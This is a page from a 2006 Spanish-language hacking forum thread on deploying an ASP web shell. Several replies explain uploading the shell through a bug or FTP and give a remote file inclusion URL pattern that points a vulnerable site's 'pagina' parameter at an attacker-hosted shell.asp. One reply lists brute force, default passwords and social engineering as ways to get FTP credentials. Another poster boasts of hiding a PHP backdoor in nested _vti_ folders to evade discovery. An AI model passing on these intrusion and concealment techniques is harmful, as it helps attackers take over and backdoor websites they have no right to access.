elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Mi Primer ASP Shell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Mi Primer ASP Shell  (Leído 27,486 veces)
Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.964


Ver Perfil WWW
Re: Mi Primer ASP Shell
« Respuesta #10 en: 14 Julio 2006, 04:06 am »

Lo cipias, lo pegas en el notepad, lo guardas con extensión asp.

Para subirlo a alguna web necesitas utilizar algún bug o subirlo por ftp (necesitas un password o un bug)

Luego entras vía http y lo ejecutas por internet explorer.
En línea

track1

Desconectado Desconectado

Mensajes: 102


Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #11 en: 14 Julio 2006, 17:35 pm »

Hola, esto es lo que no entiendo:  Luego entras vía http y lo ejecutas por internet explorer.
Pero como? Por ejemplo ya tengo una  web con el bug  pagina=http://www.foro.elhacker.net ,  entonces para aprovechar el bug quedaria algo asi: http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net
entonces  si colocora el codigo de la shell  en la web del foro tendria que agregarle  la ubicacion de la shell y quedaria algo como esto:   http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net/myshell.asp
Estoy en lo correcto???
En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO
whaky

Desconectado Desconectado

Mensajes: 150


Angel del Infierno


Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #12 en: 15 Julio 2006, 00:28 am »

www.paginavulnerable.com/index.asp?pais=xxx&pagina=http://www.tudominiocontushell.com/shell.asp

asi quedaria
En línea

Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
track1

Desconectado Desconectado

Mensajes: 102


Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #13 en: 15 Julio 2006, 03:36 am »

Gracias Whaky, ahora solo no entiendo como podria hacer una cuenta ftp y poderla usar para tener ahi la shell, me refiero a que las cuentas ftp piden user y pass y no entiendo como podria hacer.
Me refiero que al link que se le agrega a la web vulnerable es por ejemplo asi: http://ftp://ftp.web.com pero cuando se quiera acceder ahi va a pedir el loggin. Como se haria??
En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO
Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.964


Ver Perfil WWW
Re: Mi Primer ASP Shell
« Respuesta #14 en: 18 Julio 2006, 05:22 am »

Fuerza bruta.
Password default.
Bug en FTP
Robando el user y pwd mediante ingeniería social.
Con algún bug de upload que te permita subir archivos a la web.
En línea

Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #15 en: 18 Julio 2006, 18:22 pm »

Muy curro, Morris, como el que me pasastes hace un tiempo, el tema para que sirve, pues te curras, una web, te camuflas por ahi, por temp, que se io y tienes un back

ejemplo
http://www.fgfggfg.com/_vti_tmp/_vti_log/_vti_txt/_vti_root/xxxxfacer.php

este era en php,  pues me cree _vti_tmp/_vti_log/_vti_txt/_vti_root, para esconderlo bien y wuallaaa , por lo menos un año para encontrarme , Thnks Morris

Off Topic/  OLD TOPIC!!
« Última modificación: 18 Julio 2006, 18:25 pm por Man-In-the-Middle » En línea

https://www.latotatv.com
Código:
La Tota TV
AdReNaLiNe

Desconectado Desconectado

Mensajes: 115



Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #16 en: 2 Agosto 2006, 13:00 pm »

eso del ftp....tp lo entiendo yo  :-[...como lo hago, me creo una cuenta ftp por ejemplo en "miarroba" y subo a "mi pagina web" ese codigo en .asp a traves de ftp o como sea no? la cuestion es tener subido en mi pagina ese codigo para poder usarlo, ahora pongo la direccion de mi pagina de forma k abra el .asp
"www.mipagina.com/codigo.asp" y asi se abriria el codigo en la shell no???

se supone k ese codigo es un xploit (corriganme por favor si me ekivoco) y k introduciendolo en otro codigo web pues me metere como administrador y podre hacer lo k kiera en la web, para hacer tal cosa tendria k poner:

www.paginaahacker.com/index.asp?pais=xxx&pagina=http://www.mipagina.com/codigo.asp

se supone k si sale bien y ese xploit es asi como se usa (k nose mucho de exploits...nose de k tipo es este ni nada   :P) me meteria directamente en la web como administrador???


En línea

hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #17 en: 2 Agosto 2006, 18:23 pm »

bueno yo tambien tengo una dudita, el ASP, ya lo subi, a un ftp

http://psychito.webcindario.com/index.asp

ese es estoy en lo correcto como lo ise??

Ahora como lo ago funcionar, o que ondas
En línea


sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Mi Primer ASP Shell
« Respuesta #18 en: 3 Agosto 2006, 04:32 am »

investiga sobre bugs de RFI.. y su explotacion.

Saludos!!
En línea

AdReNaLiNe

Desconectado Desconectado

Mensajes: 115



Ver Perfil
Re: Mi Primer ASP Shell
« Respuesta #19 en: 3 Agosto 2006, 15:12 pm »

Todo lo k sea defacears webs...son metodos RFI?? (sql, etc...)

Creo k esta pregunta podria llegar al grado de estupida...pero esk necesito aclarar esa idea  ;D
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines